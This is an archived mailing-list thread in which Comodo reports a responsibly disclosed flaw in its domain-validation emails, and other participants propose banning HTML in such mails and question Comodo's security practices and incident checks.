Re: Server certificate domain validation bug

[yuhongbao_386]

On Friday, July 29, 2016 at 2:24:43 PM UTC-7, Hanno Böck wrote:
> Hi,
> 
> I just saw this report and my initial reaction was that it seems to be
> a grave security risk to use HTML emails with user controlled content
> for email domain validation.
> 
> I don't see any need for this and would strongly recommend that a
> policy forbidding that practice gets implemented. The alternative would
> be carefully preventing XSS issues, but honestly, XSS is complicated
> and subtle, I don't see it as realistic to prevent all XSS issues.
> 
> The domain validation process is one of the most security sensitive
> pieces of the CA ecosystem, therefore I recommend that:
> * Domain validation mails must not use HTML and must not contain any
>   user-controlled content.
> 
> -- 
> Hanno Böck
> https://hboeck.de/
> 
> mail/jabber: ha...@hboeck.de
> GPG: BBB51E42

It is not "XSS" BTW when emails don't used JavaScript.
___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy

Re: Server certificate domain validation bug

[Nick Lamb]

Hi Robin,

On Friday, 29 July 2016 18:54:56 UTC+1, Robin Alden  wrote:
> We received a report of bugs in the construction of the emails we send out
> in order to confirm authorization by the domain name registrant prior to
> issuing a server certificate.
> 
> Colloquially these are known as Domain-Control Validation Emails.

Indeed. A few questions arise. First about this specific occurrence, all 
questions are about the state prior to the incident. It's interesting to hear 
about things which have changed, but my focus at first is on how things were 
_before_ you knew about this specific problem.

1. Did Comodo grasp that these emails were a critical element of their CA 
systems? e.g. do you have a document that calls them out as being important in 
this way and distinguishes them from marketing communications and other "fluff" 
that, though it may be important to your business, is not vital to the web PKI ?

2. Was it impressed upon the software engineers responsible for Comodo's 
software which sends these emails how critical this content was ? Were they 
given suitable training e.g. based on OWASP in how to make the software secure 
against well-known risks like this ? 

3. Had Comodo engaged a third party to conduct penetration testing of their web 
site  https://secure.comodo.com/ ? If so, did that engagement include these 
emails as part of the system to be tested ? How often was this testing done ?

4. How long had this bug been present in your production systems, and to what 
certainty do you know this answer ?

> https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-
> certificates-from-comodo-via-dangling-markup-injection/index.html

Thanks for the link.

> We are pleased to report that no certificates were issued contrary to the
> terms of our CPS.

Two more, this time from the point of view of Comodo after the problem was 
reported:

5. What methods were actually used to determine whether any certificates had 
been issued contrary to the terms? Were those methods independent of the 
specific technique used in this incident, or did they assume that this method 
was the only possible means by which certificates might be mis-issued by Comodo 
at this time ?

6. Given the timeline established in question 4, were you able to perform such 
checks for the whole period affected, or only some of it ?

> We will be further engaging with external security consultants to ensure
> that our systems remain secure so that we may continue to meet our policy
> obligations.

Now a final question from the point of view of the incident having happened, 
but independent of Comodo itself:

7. In your view what new requirements should be imposed on CAs by CA/B or by 
the individual trust stores in order to reduce the risk of this sort of 
incident in future, whether at Comodo or another CA ?
___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy

Re: Server certificate domain validation bug

[Hanno Böck]

Hi,

I just saw this report and my initial reaction was that it seems to be
a grave security risk to use HTML emails with user controlled content
for email domain validation.

I don't see any need for this and would strongly recommend that a
policy forbidding that practice gets implemented. The alternative would
be carefully preventing XSS issues, but honestly, XSS is complicated
and subtle, I don't see it as realistic to prevent all XSS issues.

The domain validation process is one of the most security sensitive
pieces of the CA ecosystem, therefore I recommend that:
* Domain validation mails must not use HTML and must not contain any
  user-controlled content.

-- 
Hanno Böck
https://hboeck.de/

mail/jabber: ha...@hboeck.de
GPG: BBB51E42


pgpSoV7OKCqEc.pgp
Description: OpenPGP digital signature
___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy

Server certificate domain validation bug

[Robin Alden]

We received a report of bugs in the construction of the emails we send out
in order to confirm authorization by the domain name registrant prior to
issuing a server certificate.

Colloquially these are known as Domain-Control Validation Emails.

 

The security researcher, Matthew Bryant, followed a responsible disclosure
process and we were afforded the opportunity to resolve this bug before he
published his blog post at 

https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-
certificates-from-comodo-via-dangling-markup-injection/index.html

 

We are pleased to report that no certificates were issued contrary to the
terms of our CPS.

 

We have informed our external WebTrust auditors of the report and of its
resolution.

 

We will be further engaging with external security consultants to ensure
that our systems remain secure so that we may continue to meet our policy
obligations.

 

Regards

Robin Alden

Comodo

 

This email has also been posted to pub...@cabforum.org
 

 

___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy